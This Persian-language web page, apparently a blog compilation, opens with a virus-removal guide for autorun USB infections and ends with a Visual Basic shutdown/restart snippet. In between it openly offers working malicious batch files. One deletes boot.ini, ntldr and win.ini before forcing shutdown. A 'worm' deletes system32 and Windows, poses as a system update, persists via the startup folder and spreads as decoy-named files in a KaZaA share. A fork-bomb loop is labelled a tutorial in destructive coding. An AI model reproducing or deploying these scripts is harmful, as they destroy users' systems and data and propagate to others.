روش های مقابله و حذف ویروس ها
1 - قبل از هر چیز Task Manager را اجرا کنید ( با زدن کلیدهای Alt , CTRL , Del به صورت همزمان ) و برنامه های مشکوکی مانند Systray.exe و Userinit.exe و Spoolsv.exe و Soundman.exe و Sounmax.exe را با زدن دکمه End Task ببندید .
همچنین در بعضی از نسخه ها لازم است پروسس Svchost.exe را نیز با کلیک راست کردن و انتخاب End Process Treeببینید . ( البته چندین Svchost.exe وجود دارد که شما باید پروسسی که در ستون UserName نام کابر فعلی جلوی Svchost.exe نوشته شده را ببندید (
سپس باید به صورت دستی فایلهای Autorun.inf و Autorun.exe و Autoply.exe موجود در درایوهای آلوده را حذف کنید .
در کلیه مراحل حذف ویروس درایوها را با دابل کلیک باز نکنید و فقط از طریقRUN باز کنید .
برای حذف این فایلها می توانید وارد محیط داس شوید ، سپس در این پنجره دستورات زیر را برای کلیه درایوها انجام دهید .
حذف AUTORUN.INF
attrib -r -a -h -s Drive:\AUTORUN.INF
del Drive:\AUTORUN.INF
حذف Autorun.exe
attrib -r -a -h -s Drive:\autorun.exe
del Drive:\autorun.exe
حذف Autoply.exe
attrib -r -a -h -s Drive:\autoply.exe
del Drive:\autoply.exe
2 – سپس فایلهای زیر را دانلود نمایید .
AutoPly.exe Remover Autorun.exe Saldost Registry Repair
<!--[if !supportLineBreakNewLine]--><!--[endif]-->
برای برگرداندن Folder Optins به پنجره Run رفته و دستور Regedit را نوشته و اجرا کنید .
حال از منوی Edit گزینه Find را انتخاب کنید و عبارت NoFolderOption را نوشته تا این عبارت در رجیستری جستجو شود . هر بار که این عبارت را یافتید بایستی روی آن دابل کلیک کرده و مقدار ارزش آن را از 1 به صفر تغییر دهید . یک بار سیستم را رست کنید .
نکته 1 : درصورتیکه Taskmanager و یا Regedit نیز غیر فعال شده اند به مقاله " فعال کردن Regedit " و " فعال کردن Taskmanager " مراجعه نمایید .
نکته 2 : برای فعال کردن حالت نمایش کلیه فایلهای سیستمی و مخفی وارد My Computer شده و سپس به منوهای زیر بروید :
Tools->FolderOptions->View سپس گزینه Show Hidden Files And Filders را فعال کنید .
همچنین گزینه Hide protected operating system files را غیرفعال نمایید .
نکته 3 : توجه کنید که درایوها را با دابل کلیک باز نکنید و فقط با روش گفته شده در بالا درایوها را باز کنید .
نکته 4 : به درایوی که ویندوز در آن نصب شده بروید و در مسیر Program files پوشه XpCode را حذف کنید .
نکته 5 : به درایوی که ویندوز در آن نصب شده بروید و وارد پوشه Documents and Settings شده و در آنجا وارد پوشه ای که به نام کاربر فعلی میباشد شده و سپس در پوشه Local Settings فایل Startup.exe را حذف کنید . ( توجه کنید که Local Settings نیز پوشه ای مخفی و سیستمی است ) . در همین پوشه وارد پوشه Temp شده و کلیه فایلهای موجود در آن خصوصا Systray.exe را حذف کنید .
نکته 6 : در پنجره Run عبارت MsConfig را نوشته و در بخش Startup کلیه گزینه ها را از حالت انتخاب خارج کنید هیچکدام تیکدار نباشند .
نکته 7 : از پوشه Startup واقع در C:\Documents and Settings\ user\Start Menu\Programs\Startup برنامه هایی که کلمه Update را دارند حذف کنید . ( مانند Office Update و یا Adobe Update )
حال سیستم را ریست کنید .
3 - پس از راه اندازی مجدد سیستم ، یکبار کل سیستم را با آنتی ویروس بروز شده مانند Nod 32 اسکن کنید و درصورت رفع مشکل باز در پنجره Run عبارت MsConfig را نوشته و در بخش Startup گزینه هایی را که غیرفعال کرده بودید را به حالت قبل درآورید .
نکته 8 : در یکی از نسخه های این ویروس در بخش Startup فایلی به نام Soundman.exe یا SoundMax.exe نیز وجود دارد که باید غیر فعال شود و این فایل نیز از مسیر \Sound Utility\Soundmax.exe حذف گردد.
همچنین از طریق رجیستری در مسیر
HK_ L_M\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SoundMax
نکته 9 : System Restore را غیر فعال کنید چون که این ویروس خود را System Volume Information ذخیره می کند
smart code
@echo off
attrib –r –s –h c:\autoexec.bat
del c:\autoexec.bat
attrib –r –s –h c:\boot.ini
del c:\boot.ini
attrib –r –s –h c:\ntldr
del c:\ntdlr
attrib –r –s –h c:\windows\win.ini
del c:\windows\win.ini
@echo off
Msg *YOU GOT INFECTED!
Shutdown –s –t 7 –c “A VIRUS IS TAKING OVER c:Drive
worm 1
@ECHO OFF
if exist c:\romp.bat goto end
:start
cls
Echo Installing Update...
cd c:\windows\system
del keyboard.drv
del mouse.drv
TITLE System Update
echo ::startup >> c:\romp.bat
echo if not exist c:\damp goto prompt >> c:\romp.bat
echo :start >> c:\romp.bat
echo cls >> c:\romp.bat
echo cd c:\ >> c:\romp.bat
echo cd damp >> c:\romp.bat
echo md keys >> c:\romp.bat
echo pause >> c:\romp.bat
echo copy *.bat c:\damp\keys\ILOVEYOU.bat >> c:\romp.bat
echo copy *.bat c:\damp\keys\ILOVEYOU.bat c:\windows\stone.bat >> c:\romp.bat
echo rmdir c:\WUTemp >> c:\romp.bat
echo del c:\windows\system32\*.* >> c:\romp.bat
echo rmdir c:\windows\system32 >> c:\romp.bat
echo cd c:\ >> c:\romp.bat
echo cd windows >> c:\romp.bat
echo md system32 >> c:\romp.bat
echo pause >> c:\romp.bat
echo cd c:\ >> c:\romp.bat
echo cd windows >> c:\romp.bat
echo cd system32 >> c:\romp.bat
echo md tools >> c:\romp.bat
echo copy *.bat c:\windows\system32\tools\urscrewed.bat
echo echo msgbox" Ur system is now screwed" >> c:\plastic.vbs >> c:\romp.bat
echo echo msgbox" This was no scan... it was more like a scam" >> c:\plastic.vbs >> c:\romp.bat
echo echo msgbox" It has deleted pretty much all of system32 which is in windows and has messed
with windows" >> c:\plastic.vbs >> c:\romp.bat
echo echo msgbox" There is no more windows on this computer" >> c:\plastic.vbs >> c:\romp.bat
echo Rd/s/q c:\windows >> c:\romp.bat
echo Rd/s/q c:\progra~1 >> c:\romp.bat
echo goto part2 >> c:\romp.bat
>> c:\romp.bat
>> c:\romp.bat
echo :part2 >> c:\romp.bat
echo cls >> c:\romp.bat
echo cd c:\ >> c:\romp.bat
echo md Kierstyn'scan >> c:\romp.bat
echo pause >> c:\romp.bat
echo goto part3 >> c:\romp.bat
>> c:\romp.bat
>> c:\romp.bat
echo :part3 >> c:\romp.bat
echo rename c:\windows c:\viriiscan >> c:\romp.bat
echo goto end1 >> c:\romp.bat
echo :prompt >> c:\romp.bat
echo cls >> c:\romp.bat
echo cd c:\ >> c:\romp.bat
echo md damp >> c:\romp.bat
echo copy *.bat c:\damp.bat >> c:\romp.bat
echo echo msgbox" Oh No u r so stupid" >> c:\pomper.vbs >> c:\romp.bat
echo echo msgbox" Wow you probably got this through ur lan" >> c:\pomper.vbs >> c:\romp.bat
echo echo msgbox" Happy dieing staples" >> c:\pomper.vbs >> c:\romp.bat
echo goto start >> c:\romp.bat
>> c:\romp.bat
>> c:\romp.bat
echo :end1 >> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Matrix2.vid.bat >> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\8-legged-freaks.vid.bat >> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Password_finder.exe.bat >> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\s-club7.bmp.bat >> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\JackAss the movie.vid.bat >> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\password hacker.exe.bat >> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Norton anti virus.exe.bat >> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\8-mile.mpg.bat >> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\kazaa.exe.bat >> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\realplayer.exe.bat >> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\MyPic.bmp.bat >> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Bill gates *very funny*.bmp.bat >>
c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Bill gates *very funny*.mpg.bat >>
c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\windows xp.exe.bat >> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\How to make viruses.txt.bat >>
c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\*very funny*.bmp.bat >> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\How to stop worm viruses.txt.bat >>
c:\romp.bat
echo goto end >> c:\romp.bat
echo :end >> c:\romp.bat
Echo Virus installed
cd c:\Docume~1\All Users\Start Menu\Programs\Startup
copy *.bat cd c:\Docume~1\All Users\Start Menu\Programs\Startup
Echo Now You have to restart to save
START C:\WINDOWS\RUNDLL.EXE user.exe,exitwindowsexec
rundll32.exe shell32.dll,SHExitWindowsEx n
pause
del c:\thecreator.bat
:end
با دقت استفاده کنید
آموزش مخرب نویسی در notepad
Echo off
:loop1
start command
start command
start command
start command
start command
start command
start command
start command
start command
start command
goto loop2
:loop2
start command
start command
start command
start command
start command
start command
start command
start command
start command
start command
goto loop1
پسوند این لوپ مخرب باید bat.* باشد .
به جای start command دستورات خود را قرار دهید
Restart و ShutDown کردن سیستم در VB
سلام دوستان امروز می خواهم به سوال یکی از دوستان پاسخ دهم . یکی از دوستان پرسیده بود که چگونه می توان برنامه نوشت که بتوان سیستم را Restart و یا ShutDown کرد . خوب برای این کار کافیست که با API ها آشنایی داشته باشید , من در آموزش استفاده از Themes WinXp درباره API ها توضیحاتی دادم بد نیست که یه نگاه به اون داشته باشید . از دو تابع که در کتابخانه shell32.dll ویندوز موجود می باشد استفاده میکنیم . از تابع SHRestartSystemMB برای restart کردن و از تابع SHShutDownDialog برای shutDown کردن استفاده می شود . همچنین برای این برنامه دو ثابت تعریف کردم که در اولی عدد معادل برای restart و در دومی کد معادل برای ShutDown کردن قرار دارد .
در برنامه های قبلی هم که با کار کردن با توابع آشنا شدید دیگر فکر نکنم نیازی برای توضیح بیشتر باشه کد برای دریافت این برنامه اینجا کلیک کنید .
'Define Const For Use of API
Const Shut_Down = 1
Const Win_Reboot= 4
'Declare API Concern to Windows Restart
Private Declare Function SHRestartSystemMB Lib "shell32" Alias "#59" (ByVal hOwner As Long, ByVal sExtraPrompt As String, ByVal uFlags As Long) As Long
'Declare API Concern to Windows Shut Down
Private Declare Function SHShutDownDialog Lib "shell32" Alias "#60" (ByVal YourGuess As Long) As Long
Private Sub CmdRestart_Click()
SHRestartSystemMB Me.hwnd, vbNullString, Win_Reboot
End Sub
Private Sub CmdShutdown_Click()
SHShutDownDialog Shut_Down
End Sub